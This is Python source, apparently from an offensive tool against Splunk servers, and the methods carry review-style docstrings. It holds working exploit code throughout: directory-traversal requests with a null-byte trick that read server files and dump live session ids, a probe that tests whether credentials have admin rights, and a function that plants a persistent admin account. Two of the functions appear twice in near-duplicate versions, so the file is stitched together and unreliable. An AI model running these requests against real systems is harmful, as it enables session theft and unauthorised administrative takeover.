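def user_is_admin(self, username, password):
    """Return True when ``username``/``password`` has admin rights on the target.

    One of two probes is used, depending on which connection is up:

    * splunkd (``self.splunkd == 1``): the credentials are stored on the
      instance, ``self.splunkd_auth()`` is called (its return value is not
      inspected, as in the original), and
      ``/services/authentication/httpauth-tokens`` is fetched with HTTP
      basic auth. A body containing ``<title>httpauth-tokens`` is taken as
      proof of admin rights and ``self.got_admin`` is set to 1.
    * splunkweb (``self.splunkweb == 1``): under ``misc_lock`` the
      credentials are stored, ``self.splunkweb_auth()`` is run, and the
      admin-only server settings page is fetched; the literal
      "Port that Splunk Web uses" in the response marks an admin.

    Args:
        username: Splunk account name to test.
        password: password for ``username``.

    Returns:
        bool: always a bool. The original could fall through without an
        explicit value on the splunkweb non-admin path and when
        ``splunkweb_auth()`` failed; every path now returns False.

    Side effects:
        ``self.username``/``self.password`` are overwritten with the tested
        credentials even when the check fails, so previously stored
        credentials are lost.
    """
    if self.splunkd == 1:
        # Attempt to auth via splunkd to get a sessionkey. The original never
        # checked splunkd_auth()'s result, so neither does this.
        self.username = username
        self.password = password
        self.splunkd_auth()
        url = Requestobj(
            "{0}/services/authentication/httpauth-tokens".format(self.splunkd_url))
        url.basic_auth(username, password)
        context = url.makerequest()
        # NOTE(review): heuristic — assumes a non-admin gets a response without
        # this <title>; confirm against the target's Splunk version.
        if '<title>httpauth-tokens' in context.body:
            self.got_admin = 1
            return True
        return False

    if self.splunkweb == 1:
        with misc_lock:
            self.username = username
            self.password = password
            if not self.splunkweb_auth():
                # Login failed: no session to probe with.
                return False
            admin_only = Requestobj(
                "{0}/en-US/manager/launcher/server/settings/settings?action=edit"
                .format(self.splunkweb_url)).makerequest()
            if admin_only.find_data("Port that Splunk Web uses"):
                print("[i] User:{0} IS AN ADMIN.".format(username))
                return True
            print("[i] User:{0} is not an admin".format(username))
            return False

    print("Not Connected")
    return False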
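def dump_session_ids(self):
    """Exploit a directory-traversal issue in splunkd to dump session ids.

    Reads ``var/log/splunk/web_service.log`` through the
    ``/servicesNS/-/system/properties/`` endpoint using ``..%2f`` segments
    and a ``%00`` null byte (intended to make the server drop the trailing
    ``/default``), then greps the body for ``session=<id>`` tokens.

    Requires an established splunkd connection (``self.splunkd == 1``) and
    credentials on ``self.username``/``self.password``.

    Returns:
        set[str]: the distinct session ids found. Empty when none were found
        *or* when not connected — the original fell through without a value
        in the latter case, so callers iterating the result needed a guard.

    Caveats:
        * The traversal depth is relative to the server's working layout; the
          absolute ``/opt/splunk/...`` variant is kept in a comment below for
          targets where the short form does not resolve.
        * Null-byte truncation only works on builds still vulnerable to it; a
          patched server returns an error body and this yields an empty set.
        * The ids printed here are live credentials — treat stdout/logs of
          this tool as sensitive.
    """
    print("[i] Attemping to dump sessions")
    if not (self.splunkd == 1 and self.username and self.password):
        print("[!] Not connected to splunkd. Check port and creds")
        return set()

    # Absolute-path variant of the same traversal, kept from the original:
    # url = Requestobj("{0}/servicesNS/-/system/properties/..%2f..%2f..%2f..%2f..%2fopt%2fsplunk%2fvar%2flog%2fsplunk%2fweb_service.log%00/default".format(self.splunkd_url))
    url = Requestobj(
        "{0}/servicesNS/-/system/properties/..%2f..%2f..%2fvar%2flog%2fsplunk%2fweb_service.log%00/default"
        .format(self.splunkd_url))
    url.basic_auth(self.username, self.password)
    result = url.makerequest()

    sessions = set()
    if "session=" in result.body:
        print("[i] Session ID's extracted from web_service.log")
        # Raw string: "\s" inside a plain literal is an invalid escape on Python 3.
        sessions = set(re.findall(r"session=(.+?)[<\s]", result.body))
        for session in sessions:
            print("[SESSION] {0}".format(session))
    return sessions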
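def add_admin(self, username, password, sessionKey):
    """Create a Splunk user holding the ``user`` and ``admin`` roles.

    POSTs to ``/servicesNS/-/launcher/authentication/users`` over the splunkd
    connection, authenticating with the stored ``self.username``/
    ``self.password`` (basic auth) and additionally sending
    ``Authorization: Splunk <sessionKey>``. HTTP 201 is treated as success.

    Args:
        username: name of the account to create.
        password: its password.
        sessionKey: splunkd session key placed in the Authorization header.

    Returns:
        bool: True when the server answered 201, else False (also False, with
        a message, when not connected to splunkd).

    Notes:
        * The form body is built with ``urlencode`` instead of string
          interpolation, so a ``username`` or ``password`` containing ``&``,
          ``=``, ``%``, ``+`` or ``#`` is sent intact instead of being split
          into extra fields or truncated. For values made only of safe
          characters the encoded body is byte-identical to the original.
        * This is a persistent, attributable change on the target: the
          account stays until someone removes it. Record it for cleanup.
        * Both basic auth and a ``Splunk`` session header are sent; which one
          splunkd honours when both are present is not established here —
          verify if the request is rejected.
    """
    try:
        from urllib.parse import urlencode  # Python 3
    except ImportError:  # Python 2
        from urllib import urlencode

    if not (self.splunkd == 1 and self.username and self.password):
        print("[!] Not connected to splunkd. Check port and creds")
        return False

    # A sequence of pairs (not a dict) keeps the repeated "roles" key and
    # the original field order.
    form = urlencode([
        ("roles", "user"),
        ("roles", "admin"),
        ("name", username),
        ("defaultApp", "search"),
        ("password", password),
        ("email", ""),
        ("createrole", "0"),
        ("realname", ""),
    ])
    url = Requestobj(
        "{0}/servicesNS/-/launcher/authentication/users".format(self.splunkd_url))
    url.basic_auth(self.username, self.password)
    url.rawpostdata("POST", form)
    url.add_header("authorization", "Splunk {0}".format(sessionKey))
    result = url.makerequest()
    # Look for 201 Created; result.code may be an int or a str.
    return str(result.code) == "201"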
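def add_admin(self, username, password, sessionKey):
    """Create a Splunk account with the ``admin`` (plus ``user``) role.

    Sends a POST to ``/servicesNS/-/launcher/authentication/users`` on the
    splunkd connection. Authentication is the stored
    ``self.username``/``self.password`` via basic auth plus an
    ``Authorization: Splunk <sessionKey>`` header; a 201 status is success.

    Args:
        username: account name to create.
        password: password for the new account.
        sessionKey: splunkd session key sent in the Authorization header.

    Returns:
        bool: True on HTTP 201, otherwise False. Also False (after printing a
        hint) when there is no splunkd connection or stored credentials.

    Notes:
        * The POST body is produced by ``urlencode`` rather than a format
          string, so special characters in ``username``/``password`` (``&``,
          ``=``, ``%``, ``+``, ``#``) no longer corrupt or inject form fields.
          For plain alphanumeric values the body is identical to the original.
        * Creating an admin account is a persistent change on the target;
          track it so it can be removed after the engagement.
        * Two credentials are presented at once (basic auth and the session
          header); which one splunkd uses is not shown here — check if the
          server rejects the call.
    """
    try:
        from urllib.parse import urlencode  # Python 3
    except ImportError:  # Python 2
        from urllib import urlencode

    connected = self.splunkd == 1 and self.username and self.password
    if not connected:
        print("[!] Not connected to splunkd. Check port and creds")
        return False

    # Pairs, not a dict: "roles" appears twice and field order is preserved.
    fields = [
        ("roles", "user"),
        ("roles", "admin"),
        ("name", username),
        ("defaultApp", "search"),
        ("password", password),
        ("email", ""),
        ("createrole", "0"),
        ("realname", ""),
    ]
    endpoint = "{0}/servicesNS/-/launcher/authentication/users".format(
        self.splunkd_url)
    request = Requestobj(endpoint)
    request.basic_auth(self.username, self.password)
    request.rawpostdata("POST", urlencode(fields))
    request.add_header("authorization", "Splunk {0}".format(sessionKey))
    response = request.makerequest()
    # Look for 201 Created (code compared as text since its type is unknown).
    return str(response.code) == "201"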
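def user_is_admin(self, username, password):
    """Check whether the given credentials belong to an admin account.

    Probe order depends on the active connection:

    * ``self.splunkd == 1``: store the credentials, call
      ``self.splunkd_auth()`` (return value unused, as before) and fetch
      ``/services/authentication/httpauth-tokens`` with basic auth. The
      string ``<title>httpauth-tokens`` in the body is taken as admin
      evidence and ``self.got_admin`` is set to 1.
    * ``self.splunkweb == 1``: under ``misc_lock``, store the credentials,
      log in with ``self.splunkweb_auth()`` and request the admin-only server
      settings page; "Port that Splunk Web uses" in the response means admin.

    Args:
        username: account to test.
        password: its password.

    Returns:
        bool: True only when one of the probes succeeded. Every other path
        returns False explicitly (the original could return None when the
        splunkweb login failed or the user was not an admin).

    Side effects:
        ``self.username``/``self.password`` are replaced by the tested
        credentials regardless of the outcome.
    """
    if self.splunkd == 1:
        # Attempt to auth via splunkd to get a sessionkey.
        self.username = username
        self.password = password
        self.splunkd_auth()
        endpoint = "{0}/services/authentication/httpauth-tokens".format(
            self.splunkd_url)
        request = Requestobj(endpoint)
        request.basic_auth(username, password)
        response = request.makerequest()
        # NOTE(review): title-string match is a heuristic; confirm that a
        # non-admin really gets a different body on the target version.
        is_admin = '<title>httpauth-tokens' in response.body
        if is_admin:
            self.got_admin = 1
        return is_admin

    if self.splunkweb == 1:
        with misc_lock:
            self.username = username
            self.password = password
            if not self.splunkweb_auth():
                return False
            page = Requestobj(
                "{0}/en-US/manager/launcher/server/settings/settings?action=edit"
                .format(self.splunkweb_url)).makerequest()
            if page.find_data("Port that Splunk Web uses"):
                print("[i] User:{0} IS AN ADMIN.".format(username))
                return True
            print("[i] User:{0} is not an admin".format(username))
            return False

    print("Not Connected")
    return False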
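def get_splunk_home(self):
    """Resolve the target's SPLUNK_HOME and cache it on ``self.splunk_home``.

    When connected to splunkd (``self.splunkd`` truthy) the ``SPLUNK_HOME``
    property of ``etc/splunk-launch.conf`` is read through the
    ``/services/properties/`` traversal (``..%2f`` segments up to
    ``opt/splunk/etc/splunk-launch``). If that fails — an ``ERROR`` or
    ``Remote login disabled`` body, an exception, or no splunkd connection —
    the platform default is used: ``c:\\program files\\splunk`` when
    ``self.os_name`` contains "windows", otherwise ``/opt/splunk``.

    Returns:
        str: the resolved or defaulted home directory. The original returned
        None and left ``self.splunk_home`` unset when the request raised; the
        default is now applied on that path as well, so callers always get a
        path.

    Raises:
        SystemExit: via ``sys.exit()`` when ``self.username`` or
        ``self.password`` is empty, as in the original.

    Caveats:
        * The traversal hard-codes ``opt/splunk``, so on a non-default install
          the lookup merely confirms the default rather than discovering the
          real path.
        * ``self.splunkd`` is checked before the request is sent; the original
          sent it and then discarded the answer when not connected.
    """
    if not self.username or not self.password:
        print("[i] Valid username and password required")
        sys.exit()

    home = None
    try:
        if self.splunkd:
            r = Requestobj(
                "{0}/services/properties/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fopt%2fsplunk%2fetc%2fsplunk-launch/default/SPLUNK_HOME"
                .format(self.splunkd_url))
            r.basic_auth(self.username, self.password)
            body = r.makerequest().body
            if "ERROR" not in body and "Remote login disabled" not in body:
                home = body.strip()
    except Exception as err:
        # Best-effort lookup: report and fall back to the default below.
        print("[i] Error occured while attempting to read splunk home dir {0}".format(err))

    if home is None:
        print("[***] Could not get home dir setting default..")
        # os_name may be unset on a fresh instance; treat that as non-Windows.
        os_name = getattr(self, "os_name", None) or ""
        if "windows" in os_name.lower():
            home = "c:\\program files\\splunk"
        else:
            home = "/opt/splunk"

    self.splunk_home = home
    print("Setting Splunk home dir to:{0}".format(home))
    return home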